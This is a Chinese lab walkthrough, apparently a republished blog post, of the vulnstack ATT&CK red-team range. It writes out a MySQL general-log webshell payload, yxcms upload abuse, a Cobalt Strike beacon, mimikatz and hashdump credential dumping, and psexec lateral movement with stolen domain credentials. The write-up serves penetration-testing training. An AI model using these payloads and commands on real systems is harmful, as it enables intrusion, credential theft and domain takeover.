红日安全vulnstack-ATT&CK实战系列 红队实战(一)

这篇具有很好参考价值的文章主要介绍了红日安全vulnstack-ATT&CK实战系列 红队实战(一)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一.介绍

vulnstack官网下载地址,也是拿百度网盘下载的,这里也放一个链接提取码: i7xv

官方靶机说明:

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019

整体思路

信息收集发现yxcms框架的网页,通过漏洞利用get到shell,拿cs控制后进行内网信息收集以及横向移动,最终用窃取的凭证横向移动到其他主机,最终实现整个域的控制。可能因为是第一个靶机,没有什么防护(好吧,因为配置的原因我还把防护墙都关了),所以一套流程操作就能拿下,但是中间碰到的问题还是挺多的,有些还是值得思考的。这个靶机的web漏洞利用、内网信息收集、横向移动还有特别多的点都没有涉及到,先丢到这,等总结完每部分以后再进行补充。

二.环境搭建

下载下来是三个压缩包
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

VM1为win7,VM2为winserver 2003即win2k3,VM3为winserver 2008,分别解压出来,这里可以了解一下VMWare 文件格式详解 .VMX .VMSD .VMDK,这里我们直接打开三个虚拟机

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

拓扑图为下图所示:
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
如图我们可以看出VM1是通外网的Web服务器,VM2和VM3是内网环境,与外网隔绝,我们只可以通过VM1进行访问。所以要搞一个与外网隔绝的内网环境(包括VM1,VM2,VM3),在VMware中通过虚拟机设置里的网络适配器来完成设置(仅主机模式并放到一个VMnet中)。其次要使得VM1能够访问外网,所以需要给VM1添加一个网卡,设置成NAT模式。 VMware网络连接模式——桥接模式、NAT模式以及仅主机模式的介绍和区别

所以网络设置如下

  1. VM1(win7)

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

  1. VM2(winserver2k3)和VM3(winserver2008)

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

配置完成后开机提示按Ctrl+Alt+Del键(刚开始一直按的删除键backspace没反应,尬住了),开机初始密码都是hongrisec@2019,如果需要修改密码修改就是了(2018的应该要求必须改,我这里将2019改成2021),打开win7的界面如下,
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

首先启动phpstudy(报错就重启)
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

三.渗透测试

拿下web服务器

信息收集

上去还是扫同段主机arp-scan -l
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
进行端口扫描nmap -sV -p 1-65000 192.168.22.129

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

如果这一步没反应或者没数据,尝试ping一下win7,ping不通的话关掉win7的防火墙才行。
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
发现了80端口,本机访问发现了phpstudy探针
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
进行目录扫描,拿出我珍藏版的御剑,发现beifen.rar和phpmyadmin后台
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

下载备份rar发现该网站是yxcms
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
访问/yxcms/,发现有后台登陆密码,在指定目录登录
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
因为也扫到了phpmyadmin,这里先访问,发现弱口令root/root也登录上去了
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

漏洞利用

mysql写入shell

首先是在phpmyadmin页面中,既然已经有了管理员身份能够执行sql命令,那就直接写入webshell就好了。写入mysql_通过MySQL写入webshell的几种方式,这里通过show variables like '%secure_file%';发现secure_file_priv = NULL红日安全vulnstack-ATT&CK实战系列 红队实战(一)

这里倒是可以通过命令来开启慢查询(上面参考的这篇文章里也有写),不过这里选择使用日志写入shell(其实这里日志服务也没开,得先开一下,这里一开始没看见。。。。。)
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
指定日志文件

set global general_log_file = "C:/phpStudy/www/1.php";

红日安全vulnstack-ATT&CK实战系列 红队实战(一)
将一句话木马写入指定的文件中

SELECT '<?php eval($_POST["cmd"]);?>'

红日安全vulnstack-ATT&CK实战系列 红队实战(一)
擦试了几下都不行,一看日志服务都还关着呢

set global general_log = "ON"; 开启日志服务

成功写入,通过蚁剑连接
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

yxcms文件上传

其实在这个yxcms中漏洞更多,首先是后台的一个文件上传

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

直接新建一个一句话木马文件,他也有提示当前位置是在default文件下,我们通过刚开始的beifen.rar可以找到目录
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

yxcms/protected/apps/default/view/default/1.php

红日安全vulnstack-ATT&CK实战系列 红队实战(一)
因为是yxcms框架,其实还有sql注入,xss,任意文件删除,具体漏洞分析查看代码审计| yxcms app 1.4.6 漏洞集合

内网渗透

上线cs

这里我就拿kali作为服务端,拿我本机作为客户端。
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
先创建监听器
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

生成后门
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
通过蚁剑把exe文件扔上去,通过命令行执行,成功上线
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
这里可以先把回连间隔调小一些(打靶机的话直接0就好了)
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

主机及域内信息收集

渗透测试信息收集,可以看一下我写的这一篇文章。其实信息收集下面这一部分写的比较草,因为遇到了环境搭建的问题,并且我对这块并没有一个明确的思路,虽然说这里信息收集并没有占到很大的用处,但其实在实际渗透中,信息收集也是渗透测试的灵魂。

判断是否存在域

使用 ipconfig /all 查看 DNS 服务器(这里首先是对机器的信息收集,查型号,ip,系统等等等等,这里只写了ipconfig):

shell ipconfig /all

红日安全vulnstack-ATT&CK实战系列 红队实战(一)
查看是否有域,以及当前域(对域的信息收集):

net config workstation

红日安全vulnstack-ATT&CK实战系列 红队实战(一)
这里其实出现了问题
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
红日安全vulnstack-ATT&CK实战系列 红队实战(一)红日安全vulnstack-ATT&CK实战系列 红队实战(一)

/domain是在计算机主域的主域控制器中执行操作,如果不加这个参数的话,所有命令倒是都能正常执行。

红日安全vulnstack-ATT&CK实战系列 红队实战(一)
获取域内用户的详细信息:

wmic useraccount get /all

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

横向探测

图形化界面进行探测或者net view :

红日安全vulnstack-ATT&CK实战系列 红队实战(一)
点击这个查看扫描出来的主机(环境问题还是挺多的,抱着能跑就行的心态来搞渗透测试)

红日安全vulnstack-ATT&CK实战系列 红队实战(一)
用 cs 的 hashdump 读内存密码(或者如下图形化操作):

hashdump

红日安全vulnstack-ATT&CK实战系列 红队实战(一)
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

用 mimikatz 读注册表密码:

logonpasswords

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

在密码凭证视图里看整合的信息
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

这里也是可以直接使用工具进行提权
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

横向移动

smb

SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个 Beacons 链接后,子 Beacon 从父 Beacon
获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB
Beacon 相对隐蔽,绕防火墙时可能发挥奇效

红日安全vulnstack-ATT&CK实战系列 红队实战(一)红日安全vulnstack-ATT&CK实战系列 红队实战(一)

psexec 使用凭证登录其他主机

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

因为get到密码凭证并提权到了system,所以可以利用(这里其实有问题,因为之前改过一次密码,这里的密码已经不是hongrisec@2019而是hongrisec@2021,所以这里报错了很长时间,下图还是截的2019的图,其实是换成2021才运行的)

红日安全vulnstack-ATT&CK实战系列 红队实战(一)
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
一共执行了三个命令

beacon> rev2self
[*] Tasked beacon to revert token
beacon> make_token GOD.ORG\Administrator hongrisec@2021
[*] Tasked beacon to create a token for GOD.ORG\Administrator
beacon> jump psexec ROOT-TVI862UBEH smb

同样的方法把域控拿下
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
最终的一个图形会话
红日安全vulnstack-ATT&CK实战系列 红队实战(一)

token窃取

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

红日安全vulnstack-ATT&CK实战系列 红队实战(一)

参考[VulnStack] ATT&CK实战系列—红队实战(一)
参考红日安全vulnstack-ATT&CK实战系列 红队实战(一)
参考ATT&CK 实战 - 红日安全 vulnstack (一)
还有就是文章中的链接。文章来源地址https://www.toymoban.com/news/detail-486309.html

到了这里,关于红日安全vulnstack-ATT&CK实战系列 红队实战(一)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 红日安全vulnstack (一)

    “感谢您阅读本篇博客!如果您觉得本文对您有所帮助或启发,请不吝点赞和分享给更多的朋友。您的支持是我持续创作的动力,也欢迎留言交流,让我们一起探讨技术,共同成长!谢谢!🚀✨” 网络拓扑图 靶机参考文章 CS/MSF派发shell IP搭建教程 本机双网卡 65 网段和 83 网

    2024年04月22日
    浏览(22)
  • ATT&CK v12版本战术实战研究—持久化(二)

    前几期文章中,我们介绍了ATTCK中侦察、资源开发、初始访问、执行战术、持久化战术的知识。那么从前文中介绍的相关持久化子技术来开展测试,进行更深一步的分析。本文主要内容是介绍攻击者在运用持久化子技术时,在相关的资产服务器或者在PC机器上所产生的特征数据

    2024年02月03日
    浏览(32)
  • 【红蓝攻防鸿篇巨著】ATT&CK视角下的红蓝对抗实战指南

    【文末送书】今天推荐一本网安领域优质书籍《ATTCK视角下的红蓝对抗实战指南》,本文将从其亮点与内容出发,详细阐发其对于网安从业人员的重要性与益处。 根据中国互联网络信息中心(CNNIC)发布的第51次《中国互联网络发展状况统计报告》,截至2022年12月,我国网民规

    2024年02月07日
    浏览(46)
  • ToBeWritten之基于ATT&CK的模拟攻击:闭环的防御与安全运营

    也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大 少走了弯路,也就错过了风景,无论如何,感谢经历 转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球 感谢大家一直以来对我CSDN博客的关注和支持,但

    2024年02月09日
    浏览(44)
  • ATT&CK覆盖度97.1%!360终端安全管理系统获赛可达认证

    近日,国际知名第三方网络安全检测服务机构——赛可达实验室(SKD Labs)发布最新测试报告,360终端安全管理系统以ATTCK V12框架攻击技术覆盖面377个、覆盖度97.1%,勒索病毒、挖矿病毒检出率100%,误报率0%的突出战绩,占据行业同类产品领军地位,顺利通过赛可达实验室资产

    2024年02月12日
    浏览(34)
  • 红日靶场(七)vulnstack7

    环境下载 http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 靶场配置 DMZ IP段为192.168.1.0/24 二层网络 IP段为192.168.52.0/24 三层网络 IP段为192.168.93.0/24 VM新增虚拟网卡VMnet8、VMnet14。VMnet8为NAT模式,IP段为192.168.52.0/24;VMnet14为仅主机模式,IP段为192.168.93.0/24 VMnet14设为仅主机模式这样三层网络中

    2024年02月03日
    浏览(38)
  • vulnstack1 红日靶场渗透详解

    目录 环境搭建 信息收集 PhpMyAdmin 后台 Getshell into outfile Mysql日志文件写入shell CS后渗透 MSF后渗透 知识补充 nmap 参数分类 参数速查表 dirsearch ip段设置 kali可以访问win7,但不能直接访问win08和win2k3 开启win7 web/mysql服务 端口扫描 80/tcp open http 3306/tcp open mysql web目录扫描 爆破登录

    2024年02月12日
    浏览(38)
  • [系统安全] 四十六.恶意软件分析 (2)静态分析Capa经典工具批量提取静态特征和ATT&CK技战术

    终于忙完初稿,开心地写一篇博客。 您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列。因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全、逆向分析和恶意代

    2024年02月11日
    浏览(40)
  • Vulnstack靶场实战(一)

    搭建好靶场后 包括win7的web端,还有win2003为域成员,域控为win2008 win7内网ip:192.168.157.153 外网ip:192.168.52.143 域成员 win2003 ip 192.168.52.141 域控 win2008 ip 192.168.52.138 一、webshell的拿取 1、 首先网址访问192.168.52.143,发现是php探针页面 2、 打开御剑进行目录扫描,扫描到后台地址,

    2024年02月04日
    浏览(27)
  • 网络安全红队资源合集

    红队的整个攻击流程 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、在所有攻击结束之后清理并退出战场。 https://mitre-attack.github.io/ mitre 科技机构对攻击技术的总结 wiki https://huntingday.github.io 

    2024年02月09日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包